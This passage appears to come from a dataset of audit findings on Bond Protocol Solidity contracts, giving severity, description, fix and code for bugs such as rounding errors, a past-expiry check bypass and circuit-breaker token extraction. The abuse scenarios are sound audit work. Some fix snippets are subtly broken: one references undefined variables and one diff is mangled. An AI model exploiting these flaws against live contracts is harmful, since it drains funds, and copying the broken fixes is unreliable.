(callbackAuthorized mapping). As such, no one can purchase any bond token.\\n```\\nFile: BondBaseSDA.sol\\n function pushOwnership(uint256 id_, address newOwner_) external override {\\n if (msg.sender != markets[id_].owner) revert Auctioneer_OnlyMarketOwner();\\n newOwners[id_] = newOwner_;\\n }\\n```\\nчBefore pushing the ownership, if the market uses a callback, implement an additional validation check to ensure that the new market owner has been whitelisted to use the callback. This will ensure that transferring the market ownership will not break the market due to the new market owner not being whitelisted.\\n```\\nfunction pushOwnership(uint256 id_, address newOwner_) external override {\\n if (msg.sender != markets[id_].owner) revert Auctioneer_OnlyMarketOwner();\\n// Add the line below\\n if (markets[id_].callbackAddr != address(0) && !callbackAuthorized[newOwner_])\\n// Add the line below\\n revert newOwnerNotAuthorizedToUseCallback();\\n newOwners[id_] = newOwner_;\\n}\\n```\\nчAfter the transfer of the market ownership, the market might stop working, and no one could purchase any bond token from the market leading to a loss of sale for the market makers.ч```\\nFile: BondBaseSDA.sol\\n function purchaseBond(\\n uint256 id_,\\n uint256 amount_,\\n uint256 minAmountOut_\\n ) external override returns (uint256 payout) {\\n if (msg.sender != address(_teller)) revert Auctioneer_NotAuthorized();\\n\\n BondMarket storage market = markets[id_];\\n BondTerms memory term = terms[id_];\\n\\n // If market uses a callback, check that owner is still callback authorized\\n if (market.callbackAddr != address(0) && !callbackAuthorized[market.owner])\\n revert Auctioneer_NotAuthorized();\\n```\\n -Market Price Lower Than ExpectedчmediumчThe market price does not conform to the specification documented within the whitepaper. As a result, the computed market price is lower than expected.\\nThe following definition of the market price is taken from the whitepaper. Taken from Page 13 of the whitepaper - Definition 25\\n\\nThe integer implementation of the market price must be rounded up per the whitepaper. This ensures that the integer implementation of the market price is greater than or equal to the real value of the market price so as to protect makers from selling tokens at a lower price than expected.\\nWithin the `BondBaseSDA.marketPrice` function, the computation of the market price is rounded up in Line 688, which conforms to the specification.\\n```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? price : markets[id_].minPrice;\\n }\\n```\\n\\nHowever, within the `BondBaseSDA._currentMarketPrice` function, the market price is rounded down, resulting in the makers selling tokens at a lower price than expected.\\n```\\nFile: BondBaseSDA.sol\\n function _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n }\\n```\\nчEnsure the market price is rounded up so that the desired property can be achieved and the makers will not be selling tokens at a lower price than expected.\\n```\\nfunction _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n// Remove the line below\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n// Add the line below\\n return terms[id_].controlVariable.mulDivUp(market.totalDebt, market.scale);\\n}\\n```\\nчLoss for the makers as their tokens are sold at a lower price than expected.\\nAdditionally, the affected `BondBaseSDA._currentMarketPrice` function is used within the `BondBaseSDA._decayAndGetPrice` function to derive the market price. Since a lower market price will be returned, this will lead to a higher amount of payout tokens. Subsequently, the `lastDecayIncrement` will be higher than expected, which will lead to a lower `totalDebt`. Lower debt means a lower market price will be computed later.ч```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? price : markets[id_].minPrice;\\n }\\n```\\n -Teller Cannot Be Removed From Callback ContractчmediumчIf a vulnerable Teller is being exploited by an attacker, there is no way for the owner of the Callback Contract to remove the vulnerable Teller from their Callback Contract.\\nThe Callback Contract is missing the feature to remove a Teller. Once a Teller has been added to the whitelist (approvedMarkets mapping), it is not possible to remove the Teller from the whitelist.\\n```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\nчConsider implementing an additional function to allow the removal of a Teller from the whitelist (approvedMarkets mapping), so that a vulnerable Teller can be removed swiftly if needed.\\n```\\nfunction removeFromWhitelist(address teller_, uint256 id_) external override onlyOwner {\\n approvedMarkets[teller_][id_] = false;\\n}\\n```\\n\\nNote: Although the owner of the Callback Contract can DOS its own market by abusing the `removeFromWhitelist` function, no sensible owner would do so.чIn the event that a whitelisted Teller is found to be vulnerable and has been actively exploited by an attacker in the wild, the owner of the Callback Contract needs to mitigate the issue swiftly by removing the vulnerable Teller from the Callback Contract to stop it from draining the asset within the Callback Contract. However, the mitigation effort will be hindered by the fact there is no way to remove a Teller within the Callback Contract once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Teller to drain assets within the Callback Contract. The Callback Contract owners would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the owner accidentally whitelisted the wrong Teller, there is no way to remove it.ч```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\n -`BondAggregator.findMarketFor` Function Will Break In Certain Conditionsчmediumч`BondAggregator.findMarketFor` function will break when the `BondBaseSDA.payoutFor` function within the for-loop reverts under certain conditions.\\nThe `BondBaseSDA.payoutFor` function will revert if the computed payout is larger than the market's max payout. Refer to Line 711 below.\\n```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n\\nThe `BondAggregator.findMarketFor` function will call the `BondBaseSDA.payoutFor` function at Line 245. The `BondBaseSDA.payoutFor` function will revert if the final computed payout is larger than the `markets[id_].maxPayout` as mentioned earlier. This will cause the entire for-loop to \"break\" and the transaction to revert.\\nAssume that the user configures the `minAmountOut_` to be `0`, then the condition `minAmountOut_ <= maxPayout` Line 244 will always be true. The `amountIn_` will always be passed to the `payoutFor` function. In some markets where the computed payout is larger than the market's max payout, the `BondAggregator.findMarketFor` function will revert.\\n```\\nFile: BondAggregator.sol\\n /// @inheritdoc IBondAggregator\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n uint256[] memory ids = marketsFor(payout_, quote_);\\n uint256 len = ids.length;\\n uint256[] memory payouts = new uint256[](len);\\n\\n uint256 highestOut;\\n uint256 id = type(uint256).max; // set to max so an empty set doesn't return 0, the first index\\n uint48 vesting;\\n uint256 maxPayout;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < len; ++i) {\\n auctioneer = marketsToAuctioneers[ids[i]];\\n (, , , , vesting, maxPayout) = auctioneer.getMarketInfoForPurchase(ids[i]);\\n\\n uint256 expiry = (vesting <= MAX_FIXED_TERM) ? block.timestamp + vesting : vesting;\\n\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n }\\n\\n return id;\\n }\\n```\\nчConsider using try-catch or address.call to handle the revert of the `BondBaseSDA.payoutFor` function within the for-loop gracefully. This ensures that a single revert of the `BondBaseSDA.payoutFor` function will not affect the entire for-loop within the `BondAggregator.findMarketFor` function.чThe find market feature within the protocol is broken under certain conditions. As such, users would not be able to obtain the list of markets that meet their requirements. The market makers affected by this issue will lose the opportunity to sell their bond tokens.ч```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n -Debt Decay Faster Than ExpectedчmediumчThe debt decay at a rate faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nThe following definition of the debt decay reference time following any purchases at time `t` taken from the whitepaper. The second variable, which is the delay increment, is rounded up. Following is taken from Page 15 of the whitepaper - Definition 27\\n\\nHowever, the actual implementation in the codebase differs from the specification. At Line 514, the delay increment is rounded down instead.\\n```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\nчWhen computing the `lastDecayIncrement`, the result should be rounded up.\\n```\\n// Set last decay timestamp based on size of purchase to linearize decay\\n// Remove the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n// Add the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDivUp(payout_, lastTuneDebt);\\nmetadata[id_].lastDecay // Add the line below\\n= uint48(lastDecayIncrement);\\n```\\nчWhen the delay increment (TD) is rounded down, the debt decay reference time increment will be smaller than expected. The debt component will then decay at a faster rate. As a result, the market price will not be adjusted in an optimized manner, and the market price will fall faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nFollowing is taken from Page 8 of the whitepaper - Definition 8\\nч```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\n -Fixed Term Bond tokens can be minted with non-rounded expiryчmediumчFixed Term Tellers intend to mint tokens that expire once per day, to consolidate liquidity and create a uniform experience. However, this rounding is not enforced on the external `deploy()` function, which allows for tokens expiring at unexpected times.\\nIn `BondFixedTermTeller.sol`, new tokenIds are deployed through the `_handlePayout()` function. The function calculates the expiry (rounded down to the nearest day), uses this expiry to create a tokenId, and — if that tokenId doesn't yet exist — deploys it.\\n```\\n// rest of code\\nexpiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n\\n// Fixed-term user payout information is handled in BondTeller.\\n// Teller mints ERC-1155 bond tokens for user.\\nuint256 tokenId = getTokenId(payoutToken_, expiry);\\n\\n// Create new bond token if it doesn't exist yet\\nif (!tokenMetadata[tokenId].active) {\\n _deploy(tokenId, payoutToken_, expiry);\\n}\\n// rest of code\\n```\\n\\nThis successfully consolidates all liquidity into one daily tokenId, which expires (as expected) at the time included in the tokenId.\\nHowever, if the `deploy()` function is called directly, no such rounding occurs:\\n```\\nfunction deploy(ERC20 underlying_, uint48 expiry_)\\n external\\n override\\n nonReentrant\\n returns (uint256)\\n{\\n uint256 tokenId = getTokenId(underlying_, expiry_);\\n // Only creates token if it does not exist\\n if (!tokenMetadata[tokenId].active) {\\n _deploy(tokenId, underlying_, expiry_);\\n }\\n return tokenId;\\n}\\n```\\n\\nThis creates a mismatch between the tokenId time and the real expiry time, as tokenId is calculated by rounding the expiry down to the nearest day:\\n```\\nuint256 tokenId = uint256(\\n keccak256(abi.encodePacked(underlying_, expiry_ / uint48(1 days)))\\n);\\n```\\n\\n... while the `_deploy()` function saves the original expiry:\\n```\\ntokenMetadata[tokenId_] = TokenMetadata(\\n true,\\n underlying_,\\n uint8(underlying_.decimals()),\\n expiry_,\\n 0\\n);\\n```\\nчInclude the same rounding process in `deploy()` as is included in _handlePayout():\\n```\\nfunction deploy(ERC20 underlying_, uint48 expiry_)\\n external\\n override\\n nonReentrant\\n returns (uint256)\\n {\\n expiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n uint256 tokenId = getTokenId(underlying_, expiry_);\\n // rest of code\\n```\\nчThe `deploy()` function causes a number of issues:\\nTokens can be deployed that don't expire at the expected daily time, which may cause issues with your front end or break user's expectations\\nTokens can expire at times that don't align with the time included in the tokenId\\nMalicious users can pre-deploy tokens at future timestamps to \"take over\" the token for a given day and lock it at a later time stamp, which then \"locks in\" that expiry time and can't be changed by the protocolч```\\n// rest of code\\nexpiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n\\n// Fixed-term user payout information is handled in BondTeller.\\n// Teller mints ERC-1155 bond tokens for user.\\nuint256 tokenId = getTokenId(payoutToken_, expiry);\\n\\n// Create new bond token if it doesn't exist yet\\nif (!tokenMetadata[tokenId].active) {\\n _deploy(tokenId, payoutToken_, expiry);\\n}\\n// rest of code\\n```\\n -Fixed Term Teller tokens can be created with an expiry in the pastчhighчThe Fixed Term Teller does not allow tokens to be created with a timestamp in the past. This is a fact that protocols using this feature will expect to hold and build their systems around. However, users can submit expiry timestamps slightly in the future, which correlate to tokenIds in the past, which allows them to bypass this check.\\nIn `BondFixedTermTeller.sol`, the `create()` function allows protocols to trade their payout tokens directly for bond tokens. The expectation is that protocols will build their own mechanisms around this. It is explicitly required that they cannot do this for bond tokens that expire in the past, only those that have yet to expire:\\n```\\nif (expiry_ < block.timestamp) revert Teller_InvalidParams();\\n```\\n\\nHowever, because tokenIds round timestamps down to the latest day, protocols are able to get around this check.\\nHere's an example:\\nThe most recently expired token has an expiration time of 1668524400 (correlates to 9am this morning)\\nIt is currently 1668546000 (3pm this afternoon)\\nA protocol calls create() with an expiry of 1668546000 + 1\\nThis passes the check that `expiry_ >= block.timestamp`\\nWhen the expiry is passed to `getTokenId()` it rounds the time down to the latest day, which is the day corresponding with 9am this morning\\nThis expiry associated with this tokenId is 9am this morning, so they are able to redeem their tokens instantlyчBefore checking whether `expiry_ < block.timestamp`, expiry should be rounded to the nearest day:\\n```\\nexpiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n```\\nчProtocols can bypass the check that all created tokens must have an expiry in the future, and mint tokens with a past expiry that can be redeemed immediately.\\nThis may not cause a major problem for Bond Protocol itself, but protocols will be building on top of this feature without expecting this behavior.\\nLet's consider, for example, a protocol that builds a mechanism where users can stake some asset, and the protocol will trade payout tokens to create bond tokens for them at a discount, with the assumption that they will expire in the future. This issue could create an opening for a savvy user to stake, mint bond tokens, redeem and dump them immediately, buy more assets to stake, and continue this cycle to earn arbitrage returns and tank the protocol's token.\\nBecause there are a number of situations like the one above where this issue could lead to a major loss of funds for a protocol building on top of Bond, I consider this a high severity.ч```\\nif (expiry_ < block.timestamp) revert Teller_InvalidParams();\\n```\\n -findMarketFor() missing check minAmountOut_чmediumчBondAggregator#findMarketFor() minAmountOut_ does not actually take effect,may return a market's \"payout\" smaller than minAmountOut_ , Causes users to waste gas calls to purchase\\nBondAggregator#findMarketFor() has check minAmountOut_ <= maxPayout but the actual \"payout\" by \"amountIn_\" no check greater than minAmountOut_\\n```\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n// rest of code\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {//****@audit not check payouts[i] >= minAmountOut_******//\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n```\\nч```\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n// rest of code\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n- if (payouts[i] > highestOut) {\\n+ if (payouts[i] >= minAmountOut_ && payouts[i] > highestOut) {\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n```\\nчThe user gets the optimal market through BondAggregator#findMarketFor(), but incorrectly returns a market smaller than minAmountOut_, and the call to purchase must fail, resulting in wasted gasч```\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n// rest of code\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {//****@audit not check payouts[i] >= minAmountOut_******//\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n```\\n -Existing Circuit Breaker Implementation Allow Faster Taker To Extract Payout Tokens From MarketчmediumчThe current implementation of the circuit breaker is not optimal. Thus, the market maker will lose an excessive amount of payout tokens if a quoted token suddenly loses a large amount of value, even with a circuit breaker in place.\\nWhen the amount of the payout tokens purchased by the taker exceeds the `term.maxDebt`, the taker is still allowed to carry on with the transaction, and the market will only be closed after the current transaction is completed.\\n```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n\\nAssume that the state of the SDAM at T0 is as follows:\\n`term.maxDebt` is 110 (debt buffer = 10%)\\n`maxPayout` is 100\\n`market.totalDebt` is 99\\nAssume that the quoted token suddenly loses a large amount of value (e.g. stablecoin depeg causing the quote token to drop to almost zero). Bob decided to purchase as many payout tokens as possible before reaching the `maxPayout` limit to maximize the value he could extract from the market. Assume that Bob is able to purchase 50 bond tokens at T1 before reaching the `maxPayout` limit. As such, the state of the SDAM at T1 will be as follows:\\n`term.maxDebt` = 110\\n`maxPayout` = 100\\n`market.totalDebt` = 99 + 50 = 149\\nIn the above scenario, Bob's purchase has already breached the `term.maxDebt` limit. However, he could still purchase the 50 bond tokens in the current transaction.чConsidering only allowing takers to purchase bond tokens up to the `term.maxDebt` limit.\\nFor instance, based on the earlier scenario, only allow Bob to purchase up to 11 bond tokens (term.maxDebt[110] - market.totalDebt[99]) instead of allowing him to purchase 50 bond tokens.\\nIf Bob attempts to purchase 50 bond tokens, the market can proceed to purchase the 11 bond tokens for Bob, and the remaining quote tokens can be refunded back to Bob. After that, since the `term.maxDebt (110) == market.totalDebt (110)`, the market can trigger the circuit breaker to close the market to protect the market from potential extreme market conditions.\\nThis ensures that bond tokens beyond the `term.maxDebt` limit would not be sold to the taker during extreme market conditions.чIn the event that the price of the quote token falls to almost zero (e.g. 0.0001 dollars), then the fastest taker will be able to extract as many payout tokens as possible before reaching the `maxPayout` limit from the market. The extracted payout tokens are essentially free for the fastest taker. Taker gain is maker loss.\\nAdditionally, in the event that a quoted token suddenly loses a large amount of value, the amount of payout tokens lost by the market marker is capped at the `maxPayout` limit instead of capping the loss at the `term.maxDebt` limit. This resulted in the market makers losing more payout tokens than expected, and their payout tokens being sold to the takers at a very low price (e.g. 0.0001 dollars).\\nThe market makers will suffer more loss if the `maxPayout` limit of their markets is higher.ч```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n -Create Fee Discount Feature Is BrokenчmediumчThe create fee discount feature is found to be broken within the protocol.\\nThe create fee discount feature relies on the `createFeeDiscount` state variable to determine the fee to be discounted from the protocol fee. However, it was observed that there is no way to initialize the `createFeeDiscount` state variable. As a result, the `createFeeDiscount` state variable will always be zero.\\n```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n\\n```\\nFile: BondFixedTermTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_ - feeAmount);\\n\\n return (tokenId, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_);\\n\\n return (tokenId, amount_);\\n }\\n```\\nчImplement a setter method for the `createFeeDiscount` state variable and the necessary verification checks.\\n```\\nfunction setCreateFeeDiscount(uint48 createFeeDiscount_) external requiresAuth {\\n if (createFeeDiscount_ > protocolFee) revert Teller_InvalidParams();\\n if (createFeeDiscount_ > 5e3) revert Teller_InvalidParams();\\n createFeeDiscount = createFeeDiscount_;\\n}\\n```\\nчThe create fee discount feature is broken within the protocol. There is no way for the protocol team to configure a discount for the users of the `BondFixedExpiryTeller.create` and `BondFixedTermTeller.create` functions. As such, the users will not obtain any discount from the protocol when using the create function.ч```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n -Auctioneer Cannot Be Removed From The ProtocolчmediumчIf a vulnerable Auctioneer is being exploited by an attacker, there is no way to remove the vulnerable Auctioneer from the protocol.\\nThe protocol is missing the feature to remove an auctioneer. Once an auctioneer has been added to the whitelist, it is not possible to remove the auctioneer from the whitelist.\\n```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\nчConsider implementing an additional function to allow the removal of an Auctioneer from the whitelist, so that vulnerable Auctioneer can be removed swiftly if needed.\\n```\\nfunction deregisterAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Remove the auctioneer from the whitelist\\n _whitelist[address(auctioneer_)] = false;\\n}\\n```\\nчIn the event that a whitelisted Auctioneer is found to be vulnerable and has been actively exploited by an attacker in the wild, the protocol needs to mitigate the issue swiftly by removing the vulnerable Auctioneer from the protocol. However, the mitigation effort will be hindered by the fact there is no way to remove an Auctioneer within the protocol once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Auctioneer. The protocol team would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the admin accidentally whitelisted the wrong Auctioneer, there is no way to remove it.ч```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\n -BondBaseSDA.setDefaults doesn't validate inputsчmediumчBondBaseSDA.setDefaults doesn't validate inputs which can lead to initializing new markets incorrectly\\n```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n }\\n```\\n\\nFunction BondBaseSDA.setDefaults doesn't do any checkings, as you can see. Because of that it's possible to provide values that will break market functionality.\\nFor example you can set `minDepositInterval` to be bigger than `minMarketDuration` and it will be not possible to create new market.\\nOr you can provide `minDebtBuffer` to be 100% ot 0% that will break logic of market closing.чAdd input validation.чCan't create new market or market logic will be not working as designed.ч```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n }\\n```\\n -BondAggregator.liveMarketsBy eventually will revert because of block gas limitчmediumчBondAggregator.liveMarketsBy eventually will revert because of block gas limit\\n```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n\\nBondAggregator.liveMarketsBy function is looping through all markets and does at least `marketCounter` amount of external calls(when all markets are not live) and at most 4 * `marketCounter` external calls(when all markets are live and owner matches. This all consumes a lot of gas, even that is called from view function. And each new market increases loop size.\\nThat means that after some time `marketsToAuctioneers` mapping will be big enough that the gas amount sent for view/pure function will be not enough to retrieve all data(50 million gas according to this). So the function will revert.\\nAlso similar problem is with `findMarketFor`, `marketsFor` and `liveMarketsFor` functions.чRemove not active markets or some start and end indices to functions.чFunctions will always revert and whoever depends on it will not be able to get information.ч```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n -meta.tuneBelowCapacity param is not updated when BondBaseSDA.setIntervals is calledчmediumчWhen BondBaseSDA.setIntervals function is called then meta.tuneBelowCapacity param is not updated which has impact on price tuning.\\n```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert 